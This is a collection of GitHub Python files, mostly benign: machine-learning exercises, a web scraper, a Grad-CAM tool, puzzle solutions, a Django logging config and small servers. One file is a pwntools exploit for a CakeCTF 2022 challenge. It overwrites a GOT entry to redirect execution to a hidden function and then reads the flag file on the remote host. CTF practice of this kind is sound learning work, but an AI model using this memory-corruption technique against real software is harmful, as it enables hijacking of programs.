+{"seq_id":"16025552913","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn.tree import DecisionTreeClassifier, DecisionTreeRegressor\nfrom sklearn.model_selection import train_test_split, cross_val_score, GridSearchCV\nfrom sklearn.metrics import accuracy_score, mean_squared_error as MSE\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.neighbors import KNeighborsClassifier as KNN\nfrom sklearn.ensemble import VotingClassifier, BaggingClassifier, RandomForestRegressor\nfrom sklearn.preprocessing import scale\n\n#DecisionTreeClassifier\n\ndata = pd.read_csv('data_breast.csv', sep = ',') #Cargado de la base\ndata = data.drop(data.iloc[:,12:], axis = 1) #Se eliminan las columnas que no sirven con _std y _worst\ndata = data.drop(columns = 'id') #Se elimina la columna de 'id' que no entrega información necesaria\n\nprint(data.head())\nprint(data.info())\n\nprint(pd.unique(data['diagnosis']))\ndata['diagnosis'] = pd.get_dummies(data['diagnosis'])['M']\n\nX = data.drop(columns = 'diagnosis')\ny = data['diagnosis']\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, stratify = y, random_state= 420)\n\n\ndt = DecisionTreeClassifier(max_depth = 2, random_state = 420)\ndt.fit(X_train, y_train)\ny_pred = dt.predict(X_test)\n\nprint(accuracy_score(y_test, y_pred))\n\n\ndt1 = DecisionTreeClassifier(criterion = 'gini', random_state = 420)\ndt1.fit(X_train, y_train)\n\ny_pred1 = dt1.predict(X_test)\nprint(accuracy_score(y_test, y_pred1))\n\n#Hyperparameter Tuning for Trees\n\ndt = DecisionTreeClassifier(random_state = 420)\n\nparams_dt = {'max_depth' : [3, 4, 5, 6],\n 'min_samples_leaf' : [0.04, 0.06, 0.08],\n 'max_features' : [0.2, 0.4, 0.6, 0.8]}\n\n\n\ngrid_dt = GridSearchCV(estimator = dt, param_grid = params_dt, \n scoring = 'accuracy', cv = 10, n_jobs = -1)\n\ngrid_dt.fit(X_train, y_train)\n\nbest_hyperparams = grid_dt.best_params_\nprint(f'Best Hyperparameters:\\n {best_hyperparams}')\n\nbest_CV_score = grid_dt.best_score_\nprint(f'Best CV accuracy: \\n {best_CV_score}')\n\nbest_model = grid_dt.best_estimator_\n\ntest_acc = best_model.score(X_test, y_test)\nprint(f'Test set accuracy of BEST MODEL: {test_acc}')\n\n#DecisionTreeRegressor\n\ndf = pd.read_csv('auto-mpg.csv')\ndf = df.drop(columns = 'car name')\n\ndf['horsepower'] = df['horsepower'].astype(str)\ndf = df[df['horsepower'] != '?']\ndf['horsepower'] = pd.to_numeric(df['horsepower'])\n\nX = df.drop(columns = 'mpg')\ny = df['mpg']\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state= 3)\n\ndt = DecisionTreeRegressor(max_depth = 4, min_samples_leaf = 0.1, random_state = 3)\ndt.fit(X_train,y_train)\ny_pred = dt.predict(X_test)\n\nmse_dt = MSE(y_test,y_pred)\nrmse_dt = mse_dt**(1/2)\n\n#K-Fold CrossValidation\n\ndt = DecisionTreeRegressor(max_depth = 4, min_samples_leaf = 0.14)\nMSE_CV = - cross_val_score(dt, X_train, y_train, cv = 10, scoring = 'neg_mean_squared_error', n_jobs = -1)\ndt.fit(X_train,y_train)\ny_predict_train = dt.predict(X_train)\ny_predict_test = dt.predict(X_test)\nprint('CV MSE: {:.2f}'.format(MSE_CV.mean()))\nprint('Train MSE: {:.2f}'.format(MSE(y_train,y_predict_train)))\nprint('Test MSE: {:.2f}'.format(MSE(y_test,y_predict_test)))\n\n\n#Ensemble Learning: Hard Voting\n\nSEED = 1\n\nX = data.drop(columns = 'diagnosis')\ny = data['diagnosis']\n\nX = scale(X)\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.3, random_state= SEED)\n\nlr = 
LogisticRegression(random_state = SEED)\nknn = KNN()\ndt = DecisionTreeClassifier(random_state = SEED)\n\nclassifiers = [('Logistic Regression', lr),\n ('K Nearest Neighbors', knn),\n ('Classification Tree', dt)]\n\nfor clf_name, clf in classifiers:\n \n clf.fit(X_train, y_train)\n \n y_pred = clf.predict(X_test)\n \n print('{:s} : {:.3f}'.format(clf_name, accuracy_score(y_test, y_pred)))\n\n\nvc = VotingClassifier(estimators = classifiers)\n\nvc.fit(X_train, y_train)\n\ny_pred = vc.predict(X_test)\n\nprint(f'Voting Classifier: {accuracy_score(y_test, y_pred)}')\n\n#Ensemble Learning: Bagging\n\nSEED_1 = 2\n\nX = data.drop(columns = 'diagnosis')\ny = data['diagnosis']\n\nX = scale(X)\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.3, stratify = y, random_state= SEED_1)\n\ndt = DecisionTreeClassifier(max_depth = 4, min_samples_leaf=0.16, random_state = SEED_1)\n\nbc = BaggingClassifier(base_estimator = dt, n_estimators = 500, n_jobs = -1)\n\nbc.fit(X_train, y_train)\n\ny_pred = bc.predict(X_test)\n\naccuracy = accuracy_score(y_test, y_pred)\n\nprint(f'Accuracy of Bagging Classifier: {accuracy}')\n\nbc = BaggingClassifier(base_estimator = dt, n_estimators = 300, oob_score = True, n_jobs = -1)\n\nbc.fit(X_train, y_train)\n\ny_pred = bc.predict(X_test)\n\ntest_accuracy = accuracy_score(y_test, y_pred)\n\nprint(f'OOB Accuracy: {bc.oob_score_}')\n\n#RandomForest: Regressor \nX = df.drop(columns = 'mpg')\ny = df['mpg']\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.3, random_state= 3)\n\nrf = RandomForestRegressor(n_estimators = 400, min_samples_leaf = 0.12, random_state = 3)\n\nrf.fit(X_train, y_train)\n\ny_pred = rf.predict(X_test)\n\nrmse_test = MSE(y_test,y_pred)**(1/2)\n\nprint(f'Test set RMSE of RandomForest: {rmse_test}')\n\nimportances_rf = pd.Series(rf.feature_importances_, index = X.columns)\n\nsorted_importances_rf = importances_rf.sort_values()\n\nsorted_importances_rf.plot(kind = 'barh', color = 'lightgreen')\n\n#Hyperparameter Tuning for Random Forest\n\nparams_rf= {'n_estimators' : [300, 400, 500],\n 'max_depth' : [4, 6, 8],\n 'min_samples_leaf' : [0.1, 0.2],\n 'max_features' : ['log2', 'sqrt']}\n\ngrid_rf = GridSearchCV(estimator = rf, param_grid = params_rf, cv = 3, scoring = 'neg_mean_squared_error',\n verbose = 1, n_jobs = -1)\n\n\ngrid_rf.fit(X_train, y_train)\n\nbest_hyperparams = grid_rf.best_params_\nprint(f'Best Hyperparameters for Random Forest:\\n {best_hyperparams}')\n\nbest_model = grid_rf.best_estimator_\n\ny_pred = best_model.predict(X_test)\n\nrmse_test = MSE(y_test, y_pred)**(1/2)\nprint(f'Test set RMSE of RF: {rmse_test}')\n\n\n","repo_name":"alonsoriquelmev/DataCamp-TreeBasedModels","sub_path":"Tree Based Models.py","file_name":"Tree Based Models.py","file_ext":"py","file_size_in_byte":6082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"41390730243","text":"#Importing Libraries\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\n#Importing Dataset\r\ndataset = pd.read_csv('data.csv')\r\nX = dataset.iloc[:, :-1]\r\ny = dataset.iloc[:, 1]\r\ndataset.dtypes\r\nimport datetime as dt\r\ndataset['Date'] = pd.to_datetime(dataset.Date)\r\ndataset['Date']=dataset['Date'].map(dt.datetime.toordinal)\r\n#Splitting dataset intro training and test set\r\nfrom sklearn.model_selection import train_test_split\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)\r\n\r\n#Feature scaling\r\n'''from sklearn.preprocessing import StandardScaler\r\nsc_X = StandardScaler()\r\nX_train = sc_X.fit_transform(X_train)\r\nX_test = sc_X.transform(X_test)\r\nsc_y = StandardScaler()'''\r\n\r\n\r\n#Fitting Simple Linear Regression to the Training set\r\nfrom sklearn.linear_model import LinearRegression\r\nregressor = LinearRegression()\r\nregressor.fit(X_train, y_train)\r\n\r\n#Predicting Test set Results\r\ny_pred = regressor.predict(X_test)\r\n\r\n#Visualising training set\r\nplt.scatter(X_train, y_train, color ='red')\r\nplt.plot(X_train, regressor.predict(X_train), color='blue')\r\nplt.title('year vs annual change')\r\nplt.xlabel('year')\r\nplt.ylabel('annual change')\r\nplt.show()\r\n\r\n#Visualising test set\r\nplt.scatter(X_test, y_test, color ='red')\r\nplt.plot(X_train, regressor.predict(X_train), color='blue')\r\nplt.title('year vs annual change')\r\nplt.xlabel('year')\r\nplt.ylabel('annual change')\r\nplt.show()","repo_name":"pragyakapoor/CrudeOilPriceAnalysis","sub_path":"Simple linear regression year.py","file_name":"Simple linear regression year.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"33901253765","text":"import requests\nfrom pprint import pprint\nfrom bs4 import BeautifulSoup\n\nURL = \"https://comic.naver.com/webtoon/list.nhn?titleId=675554\"\nres = requests.get(URL)\nres.raise_for_status()\n\nsoup = BeautifulSoup(res.text, 'lxml')\n\n# 제목, 링크 구하기\ncartoons = soup.find_all(\"td\", attrs={\"class\":\"title\"})\nfor cartoon in cartoons:\n title = cartoon.a.get_text()\n link = \"https://comic.naver.com\" + cartoon.a[\"href\"]\n # rating = cartoon.find_next_sibling(\"td\").div.strong.get_text()\n print(title, link)\n\n \n# 평점 구하기\ncartoon_ratings = soup.find_all(\"div\", attrs={\"class\":\"rating_type\"})\nfor cartoon_rating in cartoon_ratings:\n rating = cartoon_rating.find(\"strong\").get_text()\n print(rating)\n","repo_name":"ririro93/web-scraping","sub_path":"nadocoding_scraping/8_bs4_gauss.py","file_name":"8_bs4_gauss.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"3886524417","text":"import argparse\nimport os\nimport torch\n\nfrom torchvision.models import (\n resnet18, resnet34, resnet50, resnet101, resnet152,\n ResNet18_Weights, ResNet34_Weights, ResNet50_Weights, \n ResNet101_Weights, ResNet152_Weights\n)\nfrom PIL import Image\nfrom src.gradcam_vis import GradCamVisualize, save_image\n\ndef get_args():\n parser = argparse.ArgumentParser()\n \n parser.add_argument('--image-path',\n type=str,\n default='',\n help='Input image path')\n \n parser.add_argument('--model',\n type=str,\n default='resnet50',\n choices=[\n 'resnet18',\n 'resnet34',\n 'resnet50',\n 'resnet101',\n 'resnet152'\n ],\n help='choose model to use'\n )\n \n parser.add_argument('--layer',\n type=int,\n default=4,\n choices=[1, 2, 3, 4],\n help='Choose layer to visualize')\n \n parser.add_argument('--block',\n type=int,\n default=-1,\n help='choose block in layer')\n \n parser.add_argument('--output_dir',\n type=str,\n default='./output/',\n help='Output directory to save image')\n \n args = parser.parse_args()\n return args\n\nif __name__ == '__main__':\n \n models = {\n 'resnet18' : (resnet18, ResNet18_Weights.DEFAULT),\n 'resnet34' : (resnet34, ResNet34_Weights.DEFAULT),\n 'resnet50' : (resnet50, ResNet50_Weights.DEFAULT),\n 'resnet101' : (resnet101, ResNet101_Weights.DEFAULT),\n 'resnet152' : (resnet152, ResNet152_Weights.DEFAULT)\n }\n \n args = get_args()\n \n if os.path.isfile(args.image_path) == False:\n raise Exception('Wrong path to image!')\n img_path = args.image_path \n \n if models.get(args.model) == None:\n raise Exception('Wrong name of model!')\n model, weights = models[args.model]\n model = model(weights=weights)\n preprocessing = weights.transforms()\n \n layers = {\n 1 : model.layer1,\n 2 : model.layer2,\n 3 : model.layer3,\n 4 : model.layer4\n }\n \n if layers.get(args.layer) == None:\n raise Exception('Wrong layer! Choose int form 1 to 4')\n layer = layers[args.layer]\n \n if len(layer) <= args.block:\n raise Exception(f'Wrong number of block! Choose int form 0 to {len(layer) - 1}')\n target_layers = [layer[args.block]] \n \n \n gradcamvis = GradCamVisualize(model, target_layers, \n torch.cuda.is_available(),\n preprocessing)\n \n vis = gradcamvis.process(img_path)\n img_with_vis = Image.fromarray(vis)\n \n if os.path.isdir(args.output_dir) == False:\n print(f'Creating new dir {args.output_dir}')\n os.mkdir(args.output_dir)\n\n save_image(img_with_vis, img_path, args.output_dir) \n \n \n ","repo_name":"mkeriy/gradcam_for_resnet","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23569846211","text":"tests = int(input())\n\nfor z in range(tests):\n N, K = [int(x) for x in input().split()]\n last = 0\n openSpaces = {N: 1}\n for i in range(K):\n largest = max(openSpaces, key=int)\n openSpaces[largest] -= 1\n if openSpaces[largest] == 0:\n openSpaces.pop(largest)\n if largest % 2 == 0:\n val1 = largest // 2 - 1\n val2 = largest - val1 - 1\n elif largest == 1:\n val1 = 0\n val2 = 0\n else:\n val1 = largest // 2\n val2 = val1\n if val1 not in openSpaces:\n openSpaces[val1] = 0\n if val2 not in openSpaces:\n openSpaces[val2] = 0\n openSpaces[val1] += 1\n openSpaces[val2] += 1\n if i == K-1:\n print(\"Case #{}: {} {}\".format(z+1, max(val1, val2), min(val1, val2)))\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_201/2275.py","file_name":"2275.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"11486941748","text":"from collections import defaultdict\n\ndef calc(set_a, set_b):\n res = set()\n for a in set_a:\n for b in set_b:\n res |= {a+b, a-b, b-a, a*b}\n if b != 0: res.add(a//b)\n if a != 0: res.add(b//a)\n return res\n\ndef solution(N, number):\n dp = defaultdict(set) # dp[i]: numbers that can be made by using N exactly i times\n for i in range(1, 9):\n n = int(str(N)*i) # ex) 55, 555, ...\n dp[i].add(n)\n \n for j in range(1, i//2+1): # +,-,*,//\n dp[i] |= calc(dp[j], dp[i-j])\n \n if number in dp[i]:\n return i\n return -1\n","repo_name":"treejw/python-for-coding-test","sub_path":"dynamic_programming/expressed_as_N.py","file_name":"expressed_as_N.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"39068902538","text":"from project.settings.base import BASE_DIR\nimport os\n\n# LOGGER \nENABLE_LOGGER = (os.environ.get('ENABLE_LOGGER') == 'True')\nif ENABLE_LOGGER:\n APP_LOG_FILENAME = BASE_DIR / 'logs/app.log'\n ERROR_LOG_FILENAME = BASE_DIR / 'logs/app-error.log'\n\n LOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'console': {\n 'format': '%(name)-12s %(levelname)-8s %(message)s',\n },\n 'file': {\n 'format': '%(asctime)s %(name)-12s %(levelname)-8s %(message)s',\n },\n 'verbose': {\n 'format': '{levelname} {asctime} {module} {process:d} {thread:d} {message}',\n 'style': '{',\n },\n 'simple': {\n 'format': '{levelname} {message}',\n 'style': '{',\n },\n 'django.server': {\n '()': 'django.utils.log.ServerFormatter',\n 'format': '[{server_time}] {message}',\n 'style': '{',\n }\n }, \n 'handlers': {\n 'console': {\n 'class': 'logging.StreamHandler',\n 'formatter': 'console'\n },\n 'file': {\n 'level': 'DEBUG',\n 'class': 'logging.FileHandler',\n 'formatter': 'file',\n 'filename': APP_LOG_FILENAME\n }\n },\n 'loggers': {\n '': {\n 'level': 'DEBUG',\n 'handlers': ['console', 'file']\n }\n }\n }","repo_name":"sanjaysikdar/pmpl-broadband-website-django","sub_path":"project/settings/config/lib/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"ar","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"15757852182","text":"from functools import reduce\nfrom operator import or_\nfrom sys import version_info\n\n\n__api__ = [\n\t'merge', 'merge_with',\n\t'Init',\n\t'Exit'\n]\n__all__ = __api__\n\n\ndef merge(*dicts):\n\t\"\"\"Merge 2 or more dictionaries.\"\"\"\n\treturn {k : reduce(lambda d,x: x.get(k, d), dicts, None) for k in reduce(or_, map(lambda x: x.keys(), dicts), set()) }\n\ndef merge_with(f, *dicts):\n\t\"\"\"Merge 2 or more dictionaries. Apply function f to each element during merge.\"\"\"\n\treturn {k : reduce(lambda x: f(*x) if (len(x) > 1) else x[0])([ d[k] for d in dicts if k in d ]) for k in reduce(or_, map(lambda x: x.keys(), dicts), set()) }\n\n\nclass Init:\n\t@classmethod\n\tdef init(cls):\n\t\tfrom colorama import init\n\n\t\tinit()#strip=False)\n\t\t# print(Background.BLACK, end=\"\")\n\n\tfrom colorama import Fore as Foreground\n\tForeground = {\n\t\t\"RED\": Foreground.LIGHTRED_EX,\n\t\t\"DARK_RED\":\t\t Foreground.RED,\n\t\t\"GREEN\": Foreground.LIGHTGREEN_EX,\n\t\t\"DARK_GREEN\": Foreground.GREEN,\n\t\t\"YELLOW\": Foreground.LIGHTYELLOW_EX,\n\t\t\"DARK_YELLOW\": Foreground.YELLOW,\n\t\t\"MAGENTA\": Foreground.LIGHTMAGENTA_EX,\n\t\t\"BLUE\": Foreground.LIGHTBLUE_EX,\n\t\t\"CYAN\": Foreground.LIGHTCYAN_EX,\n\t\t\"DARK_CYAN\": Foreground.CYAN,\n\t\t\"GRAY\": Foreground.WHITE,\n\t\t\"DARK_GRAY\": Foreground.LIGHTBLACK_EX,\n\t\t\"WHITE\": Foreground.LIGHTWHITE_EX,\n\t\t\"NOCOLOR\": Foreground.RESET,\n\n\t\t\"HEADLINE\": Foreground.LIGHTMAGENTA_EX,\n\t\t\"ERROR\": Foreground.LIGHTRED_EX,\n\t\t\"WARNING\": Foreground.LIGHTYELLOW_EX\n\t}\n\nclass Exit:\n\t@classmethod\n\tdef exit(cls, returnCode=0):\n\t\tfrom colorama import Fore as Foreground, Back as Background, Style\n\t\tprint(Foreground.RESET + Background.RESET + Style.RESET_ALL, end=\"\")\n\t\texit(returnCode)\n\n\t@classmethod\n\tdef versionCheck(cls, version):\n\t\tif (version_info < version):\n\t\t\tInit.init()\n\t\t\tprint(\"{RED}ERROR:{NOCOLOR} Used Python interpreter is to old ({version}).\".format(version=version_info, **Init.Foreground))\n\t\t\tprint(\" Minimal required Python version is {version}\".format(version=\".\".join(version)))\n\t\t\tcls.exit(1)\n\n\t@classmethod\n\tdef printException(cls, ex):\n\t\tfrom traceback import print_tb, walk_tb\n\t\tInit.init()\n\t\tprint(\"{RED}FATAL: An unknown or unhandled exception reached the topmost exception handler!{NOCOLOR}\".format(**Init.Foreground))\n\t\tprint(\"{YELLOW} Exception type:{NOCOLOR} {typename}\".format(typename=ex.__class__.__name__, **Init.Foreground))\n\t\tprint(\"{YELLOW} Exception message:{NOCOLOR} {message!s}\".format(message=ex, **Init.Foreground))\n\t\tframe,sourceLine = [x for x in walk_tb(ex.__traceback__)][-1]\n\t\tfilename = frame.f_code.co_filename\n\t\tfuncName = frame.f_code.co_name\n\t\tprint(\"{YELLOW} Caused in:{NOCOLOR} {function} in file '{filename}' at line {line}\".format(function=funcName, filename=filename, line=sourceLine, **Init.Foreground))\n\t\tif (ex.__cause__ is not None):\n\t\t\tprint(\"{DARK_YELLOW} Caused by type:{NOCOLOR} {typename}\".format(typename=ex.__cause__.__class__.__name__, **Init.Foreground))\n\t\t\tprint(\"{DARK_YELLOW} Caused by message:{NOCOLOR} {message!s}\".format(message=ex.__cause__, **Init.Foreground))\n\t\tprint((\"{RED}\" + (\"-\" * 80) + \"{NOCOLOR}\").format(**Init.Foreground))\n\t\tprint_tb(ex.__traceback__)\n\t\tprint((\"{RED}\" + (\"-\" * 80) + \"{NOCOLOR}\").format(**Init.Foreground))\n\t\tprint((\"{RED}Please report this bug at GitHub: 
https://github.com/VLSI-EDA/pyIPCMI/issues{NOCOLOR}\").format(**Init.Foreground))\n\t\tprint((\"{RED}\" + (\"-\" * 80) + \"{NOCOLOR}\").format(**Init.Foreground))\n\t\tExit.exit(1)\n\n\t@classmethod\n\tdef printNotImplementedError(cls, ex):\n\t\tfrom traceback import walk_tb\n\t\tInit.init()\n\t\tframe, _ = [x for x in walk_tb(ex.__traceback__)][-1]\n\t\tfilename = frame.f_code.co_filename\n\t\tfuncName = frame.f_code.co_name\n\t\tprint(\"{RED}NOT IMPLEMENTED:{NOCOLOR} {function} in file '{filename}': {message!s}\".format(function=funcName, filename=filename, message=ex, **Init.Foreground))\n\t\tprint((\"{RED}\" + (\"-\" * 80) + \"{NOCOLOR}\").format(**Init.Foreground))\n\t\tprint((\"{RED}Please report this bug at GitHub: https://github.com/VLSI-EDA/pyIPCMI/issues{NOCOLOR}\").format(**Init.Foreground))\n\t\tprint((\"{RED}\" + (\"-\" * 80) + \"{NOCOLOR}\").format(**Init.Foreground))\n\t\tExit.exit(1)\n\n\t@classmethod\n\tdef printExceptionBase(cls, ex):\n\t\tInit.init()\n\t\tprint(\"{RED}FATAL: A known but unhandled exception reached the topmost exception handler!{NOCOLOR}\".format(**Init.Foreground))\n\t\tprint(\"{RED}ERROR:{NOCOLOR} {message}\".format(message=ex.message, **Init.Foreground))\n\t\tprint((\"{RED}\" + (\"-\" * 80) + \"{NOCOLOR}\").format(**Init.Foreground))\n\t\tprint((\"{RED}Please report this bug at GitHub: https://github.com/VLSI-EDA/pyIPCMI/issues{NOCOLOR}\").format(**Init.Foreground))\n\t\tprint((\"{RED}\" + (\"-\" * 80) + \"{NOCOLOR}\").format(**Init.Foreground))\n\t\tExit.exit(1)\n\n\t@classmethod\n\tdef printPlatformNotSupportedException(cls, ex):\n\t\tInit.init()\n\t\tprint(\"{RED}ERROR:{NOCOLOR} Unsupported platform '{message}'\".format(message=ex.message, **Init.Foreground))\n\t\tExit.exit(1)\n\n\t@classmethod\n\tdef printEnvironmentException(cls, ex):\n\t\tInit.init()\n\t\tprint(\"{RED}ERROR:{NOCOLOR} {message}\".format(message=ex.message, **Init.Foreground))\n\t\tprint(\" Please run this script with it's provided wrapper ('pyIPCMI.[sh/ps1]') or manually load the required environment before executing this script.\")\n\t\tExit.exit(1)\n\n\t@classmethod\n\tdef printNotConfiguredException(cls, ex):\n\t\tInit.init()\n\t\tprint(\"{RED}ERROR:{NOCOLOR} {message}\".format(message=ex.message, **Init.Foreground))\n\t\tprint(\" Please run {YELLOW}'pyIPCMI.[sh/ps1] configure'{NOCOLOR} in pyIPCMI's root directory.\".format(**Init.Foreground))\n\t\tExit.exit(1)\n","repo_name":"Paebbels/pyIPCMI","sub_path":"lib/Functions.py","file_name":"Functions.py","file_ext":"py","file_size_in_byte":5592,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"61"}
+{"seq_id":"20821214977","text":"x = input(\"Enter an integer: \")\ni1 = len(x)\ni1 = int(i1)\ny = x\nx = int(x)\ns = str(x)\ni = i1\nsum = 0\nwhile i >= 0:\n a = 10**i\n p = x//a\n x = x-(p*a)\n sum = sum+p\n i = i-1\nprint(sum)\n\n\n# Procedure\n# 1. Get the length of the integer string.\n# 2. Counting up from 0 to length - 1,\n# 2-1. take one character out and convert it to an integer\n# 2-2. add that integer to sum.\n\n# for loop\nsum = 0\nfor y1 in range(0, i1, 1):\n y2 = int(y[y1])\n sum = sum+y2\nprint(sum)\n\n\n# while loop\nsum = 0\ny1 = 0\nwhile y1 < i1:\n y2 = int(y[y1])\n sum = sum+y2\n y1 = y1+1\nprint(sum)\n","repo_name":"parky83/python0209","sub_path":"st01.Python기초/py08반복문/py08_15_자리수의합.py","file_name":"py08_15_자리수의합.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"34026957593","text":"#!/usr/bin/env python3\n\nimport socketserver\nimport redis\nimport json\nimport sys\nimport pickle\n\nr = redis.StrictRedis(host='localhost', port=6379, db=0)\n#d = {}\n#r.set('lab6map', json.dumps(d))\n#g = r.hm('lab6map')\n#print(g)\n#unpacked = json.loads(g.decode('utf-8'))\n\nclass Handler(socketserver.StreamRequestHandler):\n def handle(self):\n self.data = self.rfile.readline().strip()\n print(\"{} sent:\".format(self.client_address[0]))\n string = self.data.decode('utf-8')\n js = json.loads(string)\n #js is a dict\n token = next(iter(js.keys()))\n scores = js[token]\n if r.hexists('lab6map', token):\n cur = json.loads(r.hget('lab6map', token).decode('utf-8'))\n print(\"token\", js[token], cur)\n for x in [\"1\", \"2\", \"3\", \"4\"]:\n if x not in cur and x not in js[token]:\n js[token][x] = \"-1\"\n for x in [\"1\", \"2\", \"3\", \"4\"]:\n if x not in js[token]:\n js[token][x] = cur[x]\n print(\"token\", js[token])\n else:\n for x in [\"1\", \"2\", \"3\", \"4\"]:\n if x not in js[token]:\n js[token][x] = \"-1\"\n st = json.dumps(js[token])\n print(st)\n r.hmset('lab6map', {token: st})\n\n cur = r.hgetall('lab6map')\n print(\"Scores now: \" + str(cur))\n #self.request.sendall(bytes(scores))\n\nif __name__ == \"__main__\":\n if len(sys.argv) == 1:\n port = 5858\n else:\n port = int(sys.argv[1])\n HOST, PORT = \"0.0.0.0\", port\n server = socketserver.TCPServer((HOST, PORT), Handler)\n server.serve_forever()\n","repo_name":"austinschwartz/codegen-server","sub_path":"src/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"34643336000","text":"import os\nimport uvicorn\n\nfrom pathlib import Path\nfrom fastapi import FastAPI, Request\nfrom fastapi.templating import Jinja2Templates\n\napp = FastAPI()\n\nBASE_DIR = Path(__file__).resolve().parent\ntemplates = Jinja2Templates(directory=str(Path(BASE_DIR, 'templates')))\n\n\n@app.get('/')\ndef index(request: Request):\n background_color = os.getenv(\"BACKGROUND_COLOR\", \"red\")\n message = os.getenv(\"MESSAGE\", \"This is default message\")\n\n return templates.TemplateResponse(\n 'index.html',\n context={'request': request, 'background_color': background_color, \"message\": message}\n )\n\nif __name__ == \"__main__\":\n uvicorn.run(\"main:app\", host=\"0.0.0.0\", port=8000)\n","repo_name":"cartovarc/colorfull-app","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"32689427721","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*\n\nfrom pwn import *\nfrom sys import argv\nfrom time import sleep\n\ncontext.terminal = ['tmux', 'sp', '-h']\ncontext.log_level = \"debug\"\n\nchall = \"./chall\"\n#libc = ELF()\nelf = ELF(chall)\ncontext.binary = chall\ncontext.binary.checksec()\n\nif len(argv) >= 2 and argv[1] == \"r\":\n p = remote(\"pwn1.2022.cakectf.com\", 9003)\nelif len(argv) >= 2 and argv[1] == \"d\":\n\tcmd = \"\"\"\n\t\tc\n\t\"\"\"\n\tp = gdb.debug(chall,cmd)\nelse:\n p = process(chall)\n\n\ndef set_c_str(buf):\n p.recvuntil(\"choice:\")\n p.sendline(\"1\")\n p.recvuntil(\"c_str:\")\n p.sendline(buf)\n\ndef get_c_str():\n p.recvuntil(\"choice:\")\n p.sendline(\"2\")\n p.recvuntil(\"c_str: \")\n return p.recvline().rstrip(b'\\n')\n\ndef set_str(buf):\n p.recvuntil(\"choice:\")\n p.sendline(\"3\")\n p.recvuntil(\"str:\")\n p.sendline(buf)\n\ndef get_str():\n p.recvuntil(\"choice:\")\n p.sendline(\"2\")\n p.recvuntil(\"str: \")\n return p.recvline().rstrip(b'\\n')\n\npayload = b'A' * 8\nset_str(payload)\n\npayload = b'B' * 8 * 4\npayload += p64(elf.got['_ZStrsIcSt11char_traitsIcESaIcEERSt13basic_istreamIT_T0_ES7_RNSt7__cxx1112basic_stringIS4_S5_T1_EE'])\nset_c_str(payload)\n\npayload = p64(elf.symbols['_ZN4Test7call_meEv'])\nset_str(payload)\n\npayload = b'cat flag-ba2a141e66fda88045dc28e72c0daf20.txt'\nset_str(payload)\n\np.interactive()\n","repo_name":"t3mp-0xCC/write-up","sub_path":"cakectf_2022/str_vs_cstr/exp.py","file_name":"exp.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"3208176352","text":"# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\nclass Solution:\n def insertIntoBST(self, root: TreeNode, val: int) -> TreeNode:\n if not root:\n return TreeNode(val)\n\n pos = root\n while pos:\n if val < pos.val:\n if not pos.left:\n pos.left = TreeNode(val)\n break\n else:\n pos = pos.left\n else:\n if not pos.right:\n pos.right = TreeNode(val)\n break\n else:\n pos = pos.right\n\n return root\n","repo_name":"foreverxujiahuan/algorithm","sub_path":"树/lc701.py","file_name":"lc701.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
